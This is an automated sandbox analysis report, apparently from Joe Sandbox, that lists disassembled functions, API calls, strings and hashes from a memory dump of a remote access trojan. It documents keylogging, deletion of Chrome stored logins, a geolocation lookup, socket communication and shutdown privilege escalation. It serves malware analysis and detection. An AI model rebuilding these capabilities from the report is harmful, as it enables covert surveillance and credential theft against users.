                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                                • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                                Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                  • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                                  • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                • Sleep.KERNEL32(00000BB8), ref: 0040E243
                                • ExitProcess.KERNEL32 ref: 0040E2B4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                • API String ID: 2281282204-1386060931
                                • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                                • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                                • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                • InternetCloseHandle.WININET(00000000), ref: 00419407
                                • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 004193A2
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                • GetLastError.KERNEL32 ref: 0040A999
                                Strings
                                • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                • UserProfile, xrefs: 0040A95F
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                • GetLastError.KERNEL32 ref: 00415CDB
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00408393
                                  • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                  • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                  • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                  • Part of subcall function 00404E06: CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                • FindClose.KERNEL32(00000000), ref: 004086F4
                                  • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                  • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                • String ID:
                                • API String ID: 1824512719-0
                                • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32 ref: 0040949C
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                • GetKeyState.USER32(00000010), ref: 004094B8
                                • GetKeyboardState.USER32(?), ref: 004094C5
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                • String ID:
                                • API String ID: 3566172867-0
                                • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: H"G$`'G$`'G
                                • API String ID: 341183262-2774397156
                                • Opcode ID: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
                                • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                • Opcode Fuzzy Hash: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
                                • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                  • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                  • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                  • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                  • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-1420736420
                                • Opcode ID: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                                • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                • Opcode Fuzzy Hash: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                                • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP
                                • API String ID: 2299586839-711371036
                                • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                Function 0040A0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                • wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                • API String ID: 1497725170-248792730
                                • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 004087A5
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID:
                                • API String ID: 745075371-0
                                • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 0040784D
                                • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID:
                                • API String ID: 1771804793-0
                                • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                                • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                                • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                  • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                  • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 1735047541-0
                                • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                                • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                                • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                Function 00443700 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A%E$A%E
                                • API String ID: 0-137320553
                                • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                                • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                                Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                  • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                                  • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                                  • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                                • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                • _wcschr.LIBVCRUNTIME ref: 0044F038
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
